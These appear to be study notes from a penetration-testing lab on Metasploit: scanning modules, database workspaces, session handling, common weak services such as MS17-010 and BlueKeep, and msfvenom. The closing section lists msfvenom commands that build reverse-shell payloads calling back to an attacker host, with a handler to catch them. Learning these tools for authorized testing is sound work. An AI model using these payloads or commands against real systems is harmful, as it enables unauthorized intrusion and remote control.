Scanning
-‘search portscan’: displays the available scanning modules (ack, ftpbounce, syn, tcp etc)
-‘show options’: list options available (concurrency, ports, rhosts, threads)
-possible to directly perform nmap scans from the msfconsole

UDP service identification
-scanner/discovery/udp_sweep: module allows for quick identification of services running over UDP (user datagram protocol)
-quick way to ID: DNS or NetBIOS

SMB scans
-‘smb_enumshares’
-‘smb_version’

Metasploit Database
-database functionality to simplify project management and avoid possible confusion when setting up parameter values

  1. start postgresql - ‘systemctl start postgresql’
  2. initialize the metasploit database - ‘msfdb init’
  3. launch msfconsole - ‘msfconsole’
  4. check status - ‘db_status’

-add a workspace: ‘workspace -a’ followed by name of workspace
-delete a workspace: ‘workspace -d’ followed by name of workspace

-the current workspace is printed in red, starting with a * symbol
-‘workspace’ followed by name of workspace: navigate between workspaces
-‘workspace -h’: list available options for the ‘workspace’ command

-nmap scan using ‘db_nmap’ will save all results to the database
-access hosts: ‘hosts’
-access services: ‘services’
-‘-h’: list available options for ‘hosts’ and ‘services’

You may want to look for low-hanging fruit such as:
-HTTP: could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE)
-FTP: could allow anonymous login and provide access to interesting files
-SMB: could be vulnerable to SMB exploits like MS17-010
-SSH: could have default or easy to guess credentials
-RDP: could be vulnerable to Bluekeep or allow desktop access if weak credentials were used

-‘info’ - list more information on a module
-‘show payloads’ - list the payloads that can be used with that specific exploit
-‘set payload [num]’ - choose payload
-ctrl+z - background a session
-ctrl+c - abort a session

-‘sessions’ - list all active sessions
-‘sessions -i [num]’ - interact with session

Msfvenom
-allows generation of payloads
-create payloads in PHP, exe, dll, elf, etc targeting apple, windows, android, linux
-‘msfvenom --list formats’ - list supported output formats
-encoders - encode payload with ‘-e’
-handlers - receive a connection from a target; this is ‘catching a shell’

  1. generate a PHP shell using msfvenom
  2. start the metasploit handler
  3. execute the PHP shell

-‘use exploit/multi/handler’ - receive incoming connection
-‘set payload php/reverse_php’
-‘set lhost [local host IP]’
-‘set lport [local port]’
-‘run’ - await incoming connection

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py